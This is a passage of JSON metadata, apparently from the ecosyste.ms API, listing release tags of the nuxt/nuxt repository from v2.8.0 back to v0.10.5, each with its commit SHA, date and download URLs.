cosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/